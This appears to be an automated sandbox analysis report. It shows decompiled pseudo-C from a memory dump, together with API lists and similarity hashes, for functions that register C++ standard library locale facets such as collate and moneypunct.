															__eflags = E6DDEC0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t374 - 0x20);
																E6DDF3D74(_t374 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t265, _t351, _t360, 0x14);
																E6DDD6653(_t374 - 0x14, 0);
																_t361 =  *0x6de96e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6DDB161C(0x6de96e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6DDD66BA(_t374 - 0x14);
																	return E6DDF0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6DDEC120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t374 - 0x20);
																			E6DDF3D74(_t374 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t265, _t352, _t361, 0x14);
																			E6DDD6653(_t374 - 0x14, 0);
																			_t362 =  *0x6de96e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6DDB161C(0x6de96e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6DDD66BA(_t374 - 0x14);
																				return E6DDF0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6DDEC1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t374 - 0x20);
																						E6DDF3D74(_t374 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t265, _t353, _t362, 0x14);
																						E6DDD6653(_t374 - 0x14, 0);
																						_t363 =  *0x6de96e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6DDB161C(0x6de96e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6DDD66BA(_t374 - 0x14);
																							return E6DDF0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6DDEC229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t374 - 0x20);
																									E6DDF3D74(_t374 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t265, _t354, _t363, 0x14);
																									E6DDD6653(_t374 - 0x14, 0);
																									_t364 =  *0x6de96e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6DDB161C(0x6de96e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6DDD66BA(_t374 - 0x14);
																										return E6DDF0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6DDEC295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6DDB1438(_t321);
																												E6DDF3D74(_t374 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de3851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6de3c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6DDED028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6DDF0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6DDD6FD3(__eflags, _t355);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6de96e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6DDD6FD3(__eflags, _t354);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6de96e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6DDD6FD3(__eflags, _t353);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6de96e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6DDD6FD3(__eflags, _t352);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6de96e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6DDD6FD3(__eflags, _t351);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6de96e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6DDD6FD3(__eflags, _t350);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6de96e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6DDD6FD3(__eflags, _t349);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6de96e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6DDD6FD3(__eflags, _t348);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6de96e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEB753
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB75D
int.LIBCPMT ref: 6DDEB774

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDEB797
std::_Facet_Register.LIBCPMT ref: 6DDEB7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB7EC

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: d8fbf201ef8516ef6cb8ecf5a9be8ef2c403d496a8939bc5601c038f16aa7e76
Instruction ID: c68fa22ac923e395c933a7d78cf59c5f2ce7efb9c90f6a9c99e934996a84f3eb
Opcode Fuzzy Hash: d8fbf201ef8516ef6cb8ecf5a9be8ef2c403d496a8939bc5601c038f16aa7e76
Instruction Fuzzy Hash: F211A37680822DDBCF01FB64C880ABEB7B5AF44714F270409F515AB390DF74AA058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t506 - 0x14, 0);
				_t483 =  *0x6de96df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6DDB161C(0x6de96da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6DDD66BA(_t506 - 0x14);
					return E6DDF0075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6DDE11AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t506 - 0x20);
							E6DDF3D74(_t506 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t471, _t483, 0x14);
							E6DDD6653(_t506 - 0x14, 0);
							_t484 =  *0x6de96dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6DDB161C(0x6de96d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6DDD66BA(_t506 - 0x14);
								return E6DDF0075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6DDE1230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t506 - 0x20);
										E6DDF3D74(_t506 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t358, _t472, _t484, 0x14);
										E6DDD6653(_t506 - 0x14, 0);
										_t485 =  *0x6de96dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6DDB161C(0x6de96d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6DDD66BA(_t506 - 0x14);
											return E6DDF0075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6DDE12B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t506 - 0x20);
													E6DDF3D74(_t506 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t358, _t473, _t485, 0x14);
													E6DDD6653(_t506 - 0x14, 0);
													_t486 =  *0x6de96dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6DDB161C(0x6de96d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6DDD66BA(_t506 - 0x14);
														return E6DDF0075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6DDE1339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t506 - 0x20);
																E6DDF3D74(_t506 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t358, _t474, _t486, 0x14);
																E6DDD6653(_t506 - 0x14, 0);
																_t487 =  *0x6de96db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6DDB161C(0x6de96d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6DDD66BA(_t506 - 0x14);
																	return E6DDF0075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6DDE13A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t506 - 0x20);
																			E6DDF3D74(_t506 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t358, _t475, _t487, 0x14);
																			E6DDD6653(_t506 - 0x14, 0);
																			_t488 =  *0x6de96ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6DDB161C(0x6de96d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6DDD66BA(_t506 - 0x14);
																				return E6DDF0075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6DDE1409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t506 - 0x20);
																						E6DDF3D74(_t506 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t358, _t476, _t488, 0x14);
																						E6DDD6653(_t506 - 0x14, 0);
																						_t489 =  *0x6de96de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6DDB161C(0x6de96d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6DDD66BA(_t506 - 0x14);
																							return E6DDF0075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6DDE1471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t506 - 0x20);
																									E6DDF3D74(_t506 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t358, _t477, _t489, 0x14);
																									E6DDD6653(_t506 - 0x14, 0);
																									_t490 =  *0x6de96dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6DDB161C(0x6de96da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6DDD66BA(_t506 - 0x14);
																										return E6DDF0075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6DDE14EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t506 - 0x20);
																												E6DDF3D74(_t506 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t358, _t478, _t490, 0x14);
																												E6DDD6653(_t506 - 0x14, 0);
																												_t491 =  *0x6de96dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6DDB161C(0x6de96d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6DDD66BA(_t506 - 0x14);
																													return E6DDF0075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6DDE1558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t506 - 0x20);
																															E6DDF3D74(_t506 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t358, _t479, _t491, 0x14);
																															E6DDD6653(_t506 - 0x14, 0);
																															_t492 =  *0x6de96e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6DDB161C(0x6de96dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6DDD66BA(_t506 - 0x14);
																																return E6DDF0075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6DDE15C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t506 - 0x20);
																																		E6DDF3D74(_t506 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t358, _t480, _t492, 0x14);
																																		E6DDD6653(_t506 - 0x14, 0);
																																		_t493 =  *0x6de96dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6DDB161C(0x6de96d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6DDD66BA(_t506 - 0x14);
																																			return E6DDF0075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6DDE162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6DDB1438(_t435);
																																					E6DDF3D74(_t506 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de3851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6de3c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6DDE542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6DDF0075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t481);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6de96dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t480);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6de96e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6DDD6FD3(__eflags, _t479);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6de96dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6DDD6FD3(__eflags, _t478);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6de96dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6DDD6FD3(__eflags, _t477);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6de96de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6DDD6FD3(__eflags, _t476);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6de96ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6DDD6FD3(__eflags, _t475);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6de96db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6DDD6FD3(__eflags, _t474);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6de96dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6DDD6FD3(__eflags, _t473);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6de96dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6DDD6FD3(__eflags, _t472);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6de96dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6DDD6FD3(__eflags, _t471);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6de96df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF614
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF61E
int.LIBCPMT ref: 6DDDF635

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF658
std::_Facet_Register.LIBCPMT ref: 6DDDF66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF6AD

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 716f3e79ecaae237e6095b677acc57259edcdc344010730dd68e59d646e5167e
Instruction ID: 602ef580a4b8db3b586205e244ce8c8c676d56bf65174133b35bdfaca1598f52
Opcode Fuzzy Hash: 716f3e79ecaae237e6095b677acc57259edcdc344010730dd68e59d646e5167e
Instruction Fuzzy Hash: B911C2B5908119DBCF05FB64C840BFDB7B4AF94718F27041AF521AB291DF7499018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF183, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t814 - 0x14, 0);
				_t777 =  *0x6de96de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6DDB161C(0x6de96d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
